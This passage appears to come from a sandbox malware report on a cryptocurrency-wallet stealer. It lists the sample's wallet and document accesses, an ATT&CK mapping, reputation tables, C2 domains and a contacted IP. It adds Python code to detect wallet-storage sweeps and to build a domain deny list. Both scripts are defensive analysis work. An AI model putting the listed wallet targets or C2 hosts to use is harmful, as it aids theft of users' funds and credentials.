            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; Directory queried: C:\Users\user\Documents
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; Directory queried: C:\Users\user\Documents\FENIVHOIKN
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; Directory queried: C:\Users\user\Documents\HTAGVDFUIE
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; Directory queried: C:\Users\user\Documents\MNULNCRIYC
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; Directory queried: C:\Users\user\Documents\PSAMNLJHZW
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; Directory queried: C:\Users\user\Documents\QVTVNIBKSD
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; Directory queried: C:\Users\user\Documents\VAMYDFPUND
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; Directory queried: C:\Users\user\Documents\FACWLRWHGG
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_236.exe PID: 6236, type: MEMORYSTR
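The records above show the behaviour that actually separates a stealer from a wallet application: one process opening the storage of many unrelated wallets and Chromium extension directories in a single pass. The following detection logic is an added example for this report, not Joe Sandbox code. Its path patterns are taken from the "File opened" records listed above; the event tuples, the benign process names (exodus.exe, explorer.exe) and the alert threshold are constructed assumptions.

```python
"""Flag processes that sweep multiple cryptocurrency-wallet and browser-extension
storage locations, the pattern visible in the report's "File opened" records.
Added example for this report; not Joe Sandbox code. Event tuples below are
constructed to look like endpoint file-activity telemetry, not taken from the report."""
import re
from collections import defaultdict

# Locations the sample opened, per the report, keyed by wallet family. Patterns are
# anchored to the end of the path so a parent directory listing does not match.
WALLET_PATTERNS = {
    "Exodus": r"\\AppData\\Roaming\\Exodus\\exodus\.wallet$",
    "Ledger Live": r"\\AppData\\Roaming\\Ledger Live$",
    "Atomic": r"\\AppData\\Roaming\\atomic\\Local Storage\\leveldb$",
    "Coinomi": r"\\AppData\\Local\\Coinomi\\Coinomi\\wallets$",
    "Bitcoin Core": r"\\AppData\\Roaming\\Bitcoin\\wallets$",
    "Binance": r"\\AppData\\Roaming\\Binance$",
    "Jaxx": r"\\AppData\\Roaming\\com\.liberty\.jaxx\\IndexedDB$",
    "Electrum": r"\\AppData\\Roaming\\Electrum\\wallets$",
    "Electrum-LTC": r"\\AppData\\Roaming\\Electrum-LTC\\wallets$",
    "Guarda": r"\\AppData\\Roaming\\Guarda\\IndexedDB$",
    # Chromium extension IDs are 32 characters from the range a-p.
    "Chrome extension storage": r"\\Chrome\\User Data\\[^\\]+\\Local Extension Settings\\[a-p]{32}$",
}
_COMPILED = {family: re.compile(rx, re.IGNORECASE) for family, rx in WALLET_PATTERNS.items()}

# Processes allowed to touch exactly their own family (assumed names, not from the report).
OWN_WALLET_IMAGES = {"exodus.exe": "Exodus", "electrum.exe": "Electrum"}


def classify_path(path: str):
    """Return the wallet family a path belongs to, or None."""
    for family, rx in _COMPILED.items():
        if rx.search(path):
            return family
    return None


def wallet_sweep_alerts(events, min_families: int = 3):
    """events: iterable of (timestamp, image_path, action, target_path).

    Returns {image_path: sorted wallet families} for every process that opened or
    enumerated at least `min_families` distinct wallet locations. A wallet
    application reading only its own data directory never reaches the threshold,
    which is what separates a stealer sweep from normal use."""
    touched = defaultdict(set)
    for _ts, image, action, target in events:
        if action not in ("FileOpen", "DirectoryQuery"):
            continue
        family = classify_path(target)
        if family is None:
            continue
        exe = image.rsplit("\\", 1)[-1].lower()
        if OWN_WALLET_IMAGES.get(exe) == family:
            continue  # the wallet app touching its own storage is expected
        touched[image].add(family)
    return {img: sorted(fams) for img, fams in touched.items() if len(fams) >= min_families}


# Constructed sample telemetry: the sandboxed sample's sweep plus two benign processes.
SAMPLE_IMAGE = r"C:\Users\user\Desktop\LisectAVT_2403002A_236.exe"
SAMPLE_EVENTS = [
    ("16:14:40", SAMPLE_IMAGE, "FileOpen", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn"),
    ("16:14:40", SAMPLE_IMAGE, "FileOpen", r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    ("16:14:41", SAMPLE_IMAGE, "FileOpen", r"C:\Users\user\AppData\Roaming\Ledger Live"),
    ("16:14:41", SAMPLE_IMAGE, "FileOpen", r"C:\Users\user\AppData\Roaming\Electrum\wallets"),
    ("16:14:41", SAMPLE_IMAGE, "DirectoryQuery", r"C:\Users\user\Documents"),
    ("16:14:42", r"C:\Program Files\Exodus\exodus.exe", "FileOpen", r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    ("16:14:43", r"C:\Windows\explorer.exe", "DirectoryQuery", r"C:\Users\user\AppData\Roaming"),
]

if __name__ == "__main__":
    for image, families in wallet_sweep_alerts(SAMPLE_EVENTS).items():
        print(f"ALERT {image}: {', '.join(families)}")
```

The threshold on distinct families, rather than a match on any single path, is what keeps the rule quiet on hosts where a real wallet is installed; tune `min_families` and `OWN_WALLET_IMAGES` to the software actually present in the environment.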

            Remote Access Functionality

            Source: Yara match; File source: sslproxydump.pcap, type: PCAP
            Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: LisectAVT_2403002A_236.exe PID: 6236, type: MEMORYSTR
            MITRE ATT&CK matrix, rebuilt per tactic from the flattened table. The bracketed digits reproduce the count markers the report shows beside matched techniques (run together where more than one marker was present); techniques without a marker are the matrix's unmatched placeholders.
            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
            Execution: Windows Management Instrumentation [1]; Command and Scripting Interpreter [2]; PowerShell [1]; Cron; Launchd
            Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
            Privilege Escalation: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
            Defense Evasion: Virtualization/Sandbox Evasion [11]; Deobfuscate/Decode Files or Information [11]; Obfuscated Files or Information [3]; DLL Side-Loading [1]; Software Packing
            Credential Access: OS Credential Dumping [1]; Credential API Hooking [1]; Security Account Manager; NTDS; LSA Secrets
            Discovery: Security Software Discovery [321]; Virtualization/Sandbox Evasion [11]; Process Discovery [1]; File and Directory Discovery [2]; System Information Discovery [112]
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
            Collection: Credential API Hooking [1]; Archive Collected Data [1]; Data from Local System [31]; Input Capture; Keylogging
            Command and Control: Encrypted Channel [21]; Non-Application Layer Protocol [2]; Application Layer Protocol [113]; Protocol Impersonation; Fallback Channels
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

            Antivirus detection
            Source | Detection | Scanner | Label
            LisectAVT_2403002A_236.exe | 100% | Avira | TR/Crypt.XPACK.Gen
            LisectAVT_2403002A_236.exe | 100% | Joe Sandbox ML |
            No Antivirus matches (the report's remaining three antivirus tables are empty)
            URL reputation
            URL | Detection | Scanner | Label
            http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
            http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
            http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
            http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe
            https://support.mozilla.org/products/firefoxgro.all | 0% | URL Reputation | safe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
            https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
            pooreveningfuseor.pw | 0% | Avira URL Cloud | safe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
            edurestunningcrackyow.fun | 0% | Avira URL Cloud | safe
            associationokeo.shop | 100% | Avira URL Cloud | malware
            https://unhappytidydryypwto.shop/api#: | 100% | Avira URL Cloud | phishing
            unhappytidydryypwto.shop | 100% | Avira URL Cloud | phishing
            https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
            https://unhappytidydryypwto.shop/ | 100% | Avira URL Cloud | phishing
            colorfulequalugliess.shop | 100% | Avira URL Cloud | phishing
            http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
            https://unhappytidydryypwto.shop:443/api | 100% | Avira URL Cloud | phishing
            turkeyunlikelyofw.shop | 100% | Avira URL Cloud | malware
            https://unhappytidydryypwto.shop/api | 100% | Avira URL Cloud | phishing
            detectordiscusser.shop | 100% | Avira URL Cloud | malware
            https://unhappytidydryypwto.shop/apin:L | 100% | Avira URL Cloud | phishing
            relevantvoicelesskw.shop | 100% | Avira URL Cloud | phishing
            https://unhappytidydryypwto.shop/44 | 100% | Avira URL Cloud | phishing
            wisemassiveharmonious.shop | 0% | Avira URL Cloud | safe
              Domains with a resolved address
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              unhappytidydryypwto.shop | 104.21.48.252 | true | true | (none) | unknown
              Domains
              Name | Malicious | Antivirus Detection | Reputation
              edurestunningcrackyow.fun | true | Avira URL Cloud: safe | unknown
              unhappytidydryypwto.shop | true | Avira URL Cloud: phishing | unknown
              pooreveningfuseor.pw | true | Avira URL Cloud: safe | unknown
              associationokeo.shop | true | Avira URL Cloud: malware | unknown
              colorfulequalugliess.shop | true | Avira URL Cloud: phishing | unknown
              turkeyunlikelyofw.shop | true | Avira URL Cloud: malware | unknown
              detectordiscusser.shop | true | Avira URL Cloud: malware | unknown
              wisemassiveharmonious.shop | true | Avira URL Cloud: safe | unknown
              https://unhappytidydryypwto.shop/api | false | Avira URL Cloud: phishing | unknown
              relevantvoicelesskw.shop | true | Avira URL Cloud: phishing | unknown
              URLs with the memory dumps they were found in (all dumps belong to LisectAVT_2403002A_236.exe; Malicious is false and Reputation is unknown for every entry)
              https://duckduckgo.com/chrome_newtab
                Sources: 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | Avira URL Cloud: safe
              https://duckduckgo.com/ac/?q=
                Sources: 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | Avira URL Cloud: safe
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Sources: 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | Avira URL Cloud: safe
              https://unhappytidydryypwto.shop/api#:
                Sources: 00000000.00000003.1461606764.0000000001465000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000002.1464141859.0000000001466000.00000004.00000020.00020000.00000000.sdmp | Avira URL Cloud: phishing
              https://unhappytidydryypwto.shop/
                Sources: 00000000.00000003.1360508594.0000000001419000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000003.1462122491.00000000013C5000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000003.1372307247.0000000001469000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000003.1360508594.00000000013E1000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000003.1462355021.00000000013D9000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000002.1463876472.00000000013D9000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000003.1461923804.00000000013D9000.00000004.00000020.00020000.00000000.sdmp | Avira URL Cloud: phishing
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Sources: 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | Avira URL Cloud: safe
              http://crl.rootca1.amazontrust.com/rootca1.crl0
                Sources: 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmp | URL Reputation: safe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Sources: 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | URL Reputation: safe
              http://ocsp.rootca1.amazontrust.com0:
                Sources: 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmp | Avira URL Cloud: safe
              https://www.ecosia.org/newtab/
                Sources: 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | URL Reputation: safe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Sources: 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmp | URL Reputation: safe
              https://ac.ecosia.org/autocomplete?q=
                Sources: 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | URL Reputation: safe
              https://unhappytidydryypwto.shop/apin:L
                Sources: 00000000.00000003.1461606764.0000000001465000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000003.1387782522.0000000001468000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000002.1464141859.0000000001466000.00000004.00000020.00020000.00000000.sdmp | Avira URL Cloud: phishing
              http://x1.c.lencr.org/0
                Sources: 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmp | URL Reputation: safe
              http://x1.i.lencr.org/0
                Sources: 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmp | URL Reputation: safe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Sources: 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | URL Reputation: safe
              https://unhappytidydryypwto.shop:443/api
                Sources: 00000000.00000003.1387782522.0000000001468000.00000004.00000020.00020000.00000000.sdmp | Avira URL Cloud: phishing
              http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Sources: 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmp | URL Reputation: safe
              https://support.mozilla.org/products/firefoxgro.all
                Sources: 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmp | URL Reputation: safe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Sources: 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | URL Reputation: safe
              https://unhappytidydryypwto.shop/44
                Sources: 00000000.00000003.1418365611.0000000001466000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000003.1405389775.0000000001465000.00000004.00000020.00020000.00000000.sdmp | Avira URL Cloud: phishing
              Contacted IPs
              IP | Domain | Country | ASN | ASN Name | Malicious
              104.21.48.252 | unhappytidydryypwto.shop | United States | 13335 | CLOUDFLARENET US | true
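The URL and domain tables above are memory-string scrapes, so the entries carry residue: concatenated URLs (two Yahoo URLs on one line), fragment debris such as "#:" and "n:L" after the C2 path, and a trailing "0" on certificate URLs. That last one is not part of the URL: CRL and AIA URLs in a DER-encoded certificate are followed by the next SEQUENCE tag, 0x30, which is ASCII "0". The normalizer below turns those strings into a host-level IOC set and a deny list. It is an added example for this report, not Joe Sandbox code; its input is the URL column of the reputation table copied as printed, its flagged set is the report's Malicious=true domain list, and the assumption that the search-engine and Mozilla support URLs came from browser profile data the stealer read is mine, not the report's.

```python
"""Normalize URL strings scraped from process memory into a host-level IOC set.
Added example for this report; not Joe Sandbox code. The input strings are the
URL column of the report's reputation table, copied as printed; the flagged set
is the report's Malicious=true domain list. Everything else is constructed."""
import re
from urllib.parse import urlsplit

REPORT_URL_STRINGS = [
    "http://crl.rootca1.amazontrust.com/rootca1.crl0",
    "https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=",
    "https://www.ecosia.org/newtab/",
    "https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br",
    "https://ac.ecosia.org/autocomplete?q=",
    "http://x1.c.lencr.org/0",
    "http://x1.i.lencr.org/0",
    "https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search",
    "http://crt.rootca1.amazontrust.com/rootca1.cer0?",
    "https://support.mozilla.org/products/firefoxgro.all",
    "https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=",
    "https://duckduckgo.com/chrome_newtab",
    "pooreveningfuseor.pw",
    "https://www.google.com/images/branding/product/ico/googleg_lodp.ico",
    "edurestunningcrackyow.fun",
    "associationokeo.shop",
    "https://unhappytidydryypwto.shop/api#:",
    "unhappytidydryypwto.shop",
    "https://duckduckgo.com/ac/?q=",
    "https://unhappytidydryypwto.shop/",
    "colorfulequalugliess.shop",
    "http://ocsp.rootca1.amazontrust.com0:",
    "https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=",
    "https://unhappytidydryypwto.shop:443/api",
    "turkeyunlikelyofw.shop",
    "https://unhappytidydryypwto.shop/api",
    "detectordiscusser.shop",
    "https://unhappytidydryypwto.shop/apin:L",
    "relevantvoicelesskw.shop",
    "https://unhappytidydryypwto.shop/44",
    "wisemassiveharmonious.shop",
]

# Domains the report marks Malicious=true.
REPORT_FLAGGED_DOMAINS = {
    "edurestunningcrackyow.fun", "unhappytidydryypwto.shop", "pooreveningfuseor.pw",
    "associationokeo.shop", "colorfulequalugliess.shop", "turkeyunlikelyofw.shop",
    "detectordiscusser.shop", "wisemassiveharmonious.shop", "relevantvoicelesskw.shop",
}

URL_RX = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s\"'<>#]*)?")
HOST_RX = re.compile(r"^[A-Za-z0-9.\-]+$")


def repair_host(host: str):
    """Strip digit residue from the TLD label. URLs inside DER-encoded certificates
    (CRL/AIA fields) are followed in memory by the SEQUENCE tag 0x30, which prints
    as '0'; a TLD never ends in a digit, so the residue is unambiguous."""
    labels = host.lower().split(".")
    tld = labels[-1]
    if tld.isdigit():
        return host.lower(), False          # numeric last label: an IP address, leave it
    stripped = tld.rstrip("0123456789")
    labels[-1] = stripped
    return ".".join(labels), stripped != tld


def normalize_memory_urls(lines, flagged=REPORT_FLAGGED_DOMAINS):
    """Return {host: {"flagged": bool, "der_residue": bool, "paths": sorted list}}."""
    result = {}
    for line in lines:
        # Adjacent memory strings run together; split at every scheme boundary.
        pieces = [p for p in re.split(r"(?=https?://)", line.strip()) if p]
        for piece in pieces:
            m = URL_RX.match(piece)
            if m:
                parts = urlsplit(m.group(0))
                raw_host, path = parts.hostname or "", parts.path
            elif HOST_RX.match(piece):
                raw_host, path = piece, ""       # bare domain, as the config lists them
            else:
                continue
            host, residue = repair_host(raw_host)
            entry = result.setdefault(host, {"flagged": host in flagged, "der_residue": False, "paths": set()})
            entry["der_residue"] |= residue
            if path:
                entry["paths"].add(path)
    for entry in result.values():
        entry["paths"] = sorted(entry["paths"])
    return result


def blocklist(result):
    """Hosts the report flagged, in a form suitable for a DNS or proxy deny list."""
    return sorted(h for h, e in result.items() if e["flagged"])


if __name__ == "__main__":
    iocs = normalize_memory_urls(REPORT_URL_STRINGS)
    for host in blocklist(iocs):
        print(host, iocs[host]["paths"])
```

Path debris is deliberately left in place ("/apin:L", "/rootca1.crl0") because a path is never what you block on; the host is, and the host repair is limited to the one residue pattern whose origin is known.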
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1482389
              Start date and time:2024-07-25 22:13:53 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 3m 48s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of new started processes analysed:5
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:LisectAVT_2403002A_236.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
